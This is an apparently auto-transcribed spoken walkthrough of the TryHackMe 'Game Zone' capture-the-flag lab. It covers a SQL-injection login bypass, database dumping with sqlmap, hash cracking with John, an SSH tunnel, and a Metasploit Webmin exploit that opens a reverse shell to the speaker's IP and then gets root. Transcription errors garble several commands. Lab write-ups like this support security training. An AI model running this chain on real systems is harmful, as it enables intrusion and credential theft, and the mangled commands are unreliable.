All right. So we do have this page open up. Let's start the machine. Deploy the machine, access this web server, name 10 SQLI. Doesn't require any interactions. Okay, so it's done. Let's wait till machines comes on. "34 seconds. Let me fix it to my terminal. Okay. 1017 440. Good. Three, two, one. Yeah. Okay. Let's open it up, see if there's a website. Yes, there is. And do a quick map. Map. Okay, zone. Okay. So the first question was, what is the name of the large cartoon outdoor? Large cartoon. This is the large cartoon. And here dot image. Repeat source. So long not registered. No comments or whatsoever. Select element. Okay. Let's see. So let's copy this image and Google around it. Nice. Image. And this is agent 47. All right. Agent 47. Okay. SQL injection, following question. If you have username and password as this, it should work. Use this as a username password field. Don't need that. Now we logged in. The question is, what page redirect to? Portal.php. Using SQLMap. I guess I already have SQLMap installed. SQLMap. Yep. So we use pub suite, capture the packet, and do the thing. Let's go start pub suite. And meanwhile, I'll just do Foxy proxy. So Foxy proxy downloaded. I accept. Start the pub suite. And we'll do the quick configuration here. Add burp 127.0.0 home 8080. All right. Foxy tab looks good. Delete this one. R123 burp. Enter. Got this action. Copy to a file. Share. TryHackMe. Roam. Games on. Login.request. SQLMap -r login.request --batch. Cache login.request. Looks good to me. SQLMap. Okay, so they're asking me to run the entire command. All right, let's do that. Login.request. Okay. Same login.request. I do have this SQL syntax error. That's why it's erroring out. So let's fix it real quick. And username will be Roy. And SQL-DB MS. That is for telling them database is MySQL -- dump all -- batch. So everything should be automated. No question asked. Username might not be injectable. Might be, not sure. Okay, we can do a manual thing real quick to figure out. Okay, that is search for game and review, ID. Nothing comes in. All right. What is the hash password? What is the associated hash username? What is the table? Cracking the password. Doing that. This. All left with is wait. Okay, that's this is going on. And they are running this thing on a different uh, thing, that is portal.php. So let's do that as well. So portal.php test returns nothing. So let's send it on over verb and run SQLMap on this one as well. So that we'll do a quick test. Intercept is off, turn it on. Action, copy to a file, and we're gonna name it as portal.request. And we'll run a quick SQLMap on that. Sure. Home, that is game zone. SQLMap dash r portal.request dash tbms is equal to mysql dash batch dash dump dash all. And we'll wait for these two to finish. This one looks promising. Okay, this one just going to cancel out, so let's turn it off. What's going on? Come on. All right. So fetching the information. Great. I should have looked into the table names first. Anyways, let it be done. So I'm just looking at the database name, still information schema. That is a default database that MySQL creates. So not interested in anything on those things. And that's just a waste of time. I should have checked into the database first. Anyways, we'll have it running. Okay, I gave up. We'll do dash dbs to list the databases. And we have a DB, so we'll do capital D. Select the database, it's called DB and dash dash down. Okay, it's trying to capture or crack the passwords. Nice. Now we can cancel it out. Agent 47 is the username. There is a question for that, I guess. It was in here. What is the username associated with the hash? Agent 47. Isn't that correct? Oh, we're going through the bug. Let's close it up. Correct answer. The next one we have is the hash itself. So that would be this. Copy selection. Paste it here. And then I'm going to just do echo this hash to SQL.hash. We have to crack this hash. And we'll do a quick other command that would be dash dash dbs to dash d db dash dash tables, because there's a question that says what is the other table name, that is post here. All right. Cracking the password with John the Ripper. I guess I have John installed. So JOHN. Yep, I have John installed. So what is the dehashed password? All right. So we'll do what word list they're using. The ROCU. Let's user share word list ROCU exist. So we'll do John dash dash just to SQL.hash dash w user share word list ROCU.txt. And let's select that database hash type itself. If that takes a longer time, I'll just go and change this hash value. That's taking a little bit longer. So look at SQL.hash, copy this, hash ID, hash ID, and this is short to 56. So we'll do that. John dash dash format is equal to raw straw to 56, and then the as file name, that is SQL.hash, and then dash dash word list user share word list ROCU.txt. Hit enter. Is it cracked? Nope, did not crack. Okay, so dash dash for format raw dash short 56. Did I? That is the word list, right? User share word list ROCU.txt. Video gamer 124. We could do that show options to see it print out here. What is the user flag? We creates agent 47. It is there. SSH pass. I don't have SSH installed, so SSH agent 47 at 10, 10, 19, 108. Yes. 1, 2, 3. Oh, sorry. What? And I have double A. That's typo. And it's showing me connection refused. Uh-huh. 10, 10, 19, 108. Closed. What? Ten, 10, 19, 108. Closed. Okay, let me terminate and restart this machine real quick. Okay, start the machine. Where the password crack? Just look into SSH and find this flag. Meanwhile, I can install sudo apt install SSH pass. And basically, SSH pass allowed me to do this. -p. Now I see where I have that message. And the IP address will be the new one. We've just got Metasploit as well. Okay. 10, 10, 99, 207. All right, we do have that enabled. And video gamer 124, copy it. Key verification, yes, trust it. Logged in, cat users.txt. That would be the flag. The next thing is exposing services with reverse SSH tunnels. We have to go to reverse connection. All right. So why we need to do that? How many TCP sockets are running? All right. So we have to find out how many TCP sockets we have running, and then based on that we can go. So SS installed. Yep, that's installed. SS TU LPN, I guess. Yep. So we can see the process. We'll do wc-l to count the 9. Okay, add it out. What? Okay. Oh, these are the UDPs. We just need TCP. So I'll do grep TCP and do that. Fine. All right. From local machines run SSH -l 1000 localhost 1000 username @ IP address. And why we are doing that? Because we have this port open here. And this is listening to everywhere. Why we need to do that? Curl localhost 10,000, and we CURL. Okay, so there is a service running. Let's close it up and reconnect back. So just go and copy this command. Back here, this agent47 @ this. Password. Now, basically what this does, it just goes and expose my local host port 10,000 to the server. So server port 10,000 is now accessing, we can access it from here. And that's it. That's what we needed to do. I guess, yep, that is that. What is the name of the expose CMS? It says webmin right here. Is that answer? Oh, that was the answer. What is the CMS version? We can do a quick nmap scan to find out, or we can just do just view page source and try to find it here. Nothing looks good. I'll just run a quick nmap against this. So sudo nmap -p 10,000 localhost -sv -c -on nmap web main. Might take a few seconds. Meanwhile, I'll try one more trick that usually works. That would be open up this network tab, reload it, select the root packet, and get to work. Webmin 1.580. So it does expose this version here. Let's go here, type it. But what was the hint though? Any credentials you can make use of to log in. We can use like, what was the credentials? Agent 47 one, right? So let's try it here. And the password was video gamer 124. Agent 47. And what do we know? That was easy. Okay, next thing is privilege escalations with Metasploit. Okay, so we need to start Metasploit. It does print out version here as well. So we have 3 ways to find out this thing. I'll do msf console -q-. Let's restart Metasploit console for me. All right, then we search for webmin. And we do see there is webmin available. Exploit webmin show CGI, exact. Now rank is excellent. I'm gonna just use that. So use 0, show options, exploit, set password to video gamer 124. That is the required field. Set our hosts. That would be 1010 99207. Set username agent 47. Set SSL. Oh, SSL is not used by this much server, I guess. Nope, no SSL. So set SSL to false, or it will try to connect with SSL. Okay. So 10,000 is the default port. Don't have to change that. Can we do check? Server is running, but could not be validated. Let's do exploit. A payload is not been selected. That would be an error. Don't I have payload selected? Module options, video gamer, is that set payload, CMD needs generic, exploit. Set payload, CMD, sorry. CMD Unix generic. Why not working? Okay, setting. Set payload CMD Unix. They're telling CMD Unix by default. Reverse, show options, set lhost to 10.17.4.40. That is my IP address, right? It's config tom 0, 10.17.4.40. Great. Exploit. Authentication failed. I screwed up something. Show options, set password, video gamer thing. Cat creds, video gamer 1. AGENT 47, authentication failed. Something is wrong. Show options, set username, agent 47. Run it. And authentication failed. Show options, set. Okay, our host will be my local host. Because we are not exposing on internet, that is exposing on my local machine. All right, so authentication successful, everything goes well. And we should get a shell now. ID, yep, we get the set. Which Python? We have Python, so we'll do Python-C, and that is just a one-liner shell thing. Import pty, and this is where I make typos. So just going to take font w spawn, and we'll do bin bash like that and close it. All right. Export trom is equal to xtrom, and just allow me to do little bit things. We don't need to do these things because we already wrote, right? So all we do is take the flag. So that is there. Copy it, go back to our challenge, paste the flag, and we got it. Awesome.